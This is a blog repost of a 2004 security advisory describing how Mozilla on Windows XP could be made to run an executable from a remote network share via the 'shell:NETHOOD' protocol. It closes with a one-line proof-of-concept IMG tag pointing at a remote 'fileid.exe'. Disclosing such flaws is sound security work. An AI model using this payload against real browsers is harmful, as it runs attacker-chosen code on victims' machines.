QODS ec

Saturday, July 10, 2004

SEC: MOZILLA: SHELL can execute remote EXE program

Gmail - [Full-Disclosure] MOZILLA: SHELL can execute remote EXE program

SUBJ: MOZILLA: SHELL can execute remote EXE program
DATE: 2004/07/09
FROM: Liu Die Yu
############################################################
[START] Advisory
############################################################

COPYRIGHT
---------
This Advisory is Copyright (c) 2004 "Liu Die Yu".
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts of it without the
author's written permission.
( To contact "Liu Die Yu": email: liudieyu AT UMBRELLA d0t NAME )

TESTED
------
MOZILLA("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040616")
running on winxp.en.home.sp1a.up2date.20040709

PROCESS
-------
VICTIM VISITS A SHARED FOLDER NAMED "shared" ON A SERVER NAMED "X-6487ohu4s6x0p".
THIS WILL CREATE A SHORTCUT NAMED "shared on X-6487ohu4s6x0p" IN THE FOLDER AT
"shell:NETHOOD"

AT LAST, MAKE MOZILLA REQUEST THE FOLLOWING URL:
shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe

A FILE NAMED "fileid.exe" IN THE "shared" FOLDER WILL BE EXECUTED.

REFERENCE
---------
MOZILLA will open/execute a file when navigated to a valid SHELL-protocol url:
http://seclists.org/lists/fulldisclosure/2004/Jul/0333.html
greetingz fly to perrymonj.

WINDOWS support "shell:NETHOOD":
http://does-not-exist.org/mail-archives/bugtraq/msg02171.html
thanks to malware for his additional research , and Cheng Peng Su for his
original discovery.

liudieyu

http://umbrella.name

############################################################
[START] PROOF OF CONCEPT
############################################################


[IMG SRC="shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe"]

0 Comments:

Post a Comment

<< Home


Get Firefox!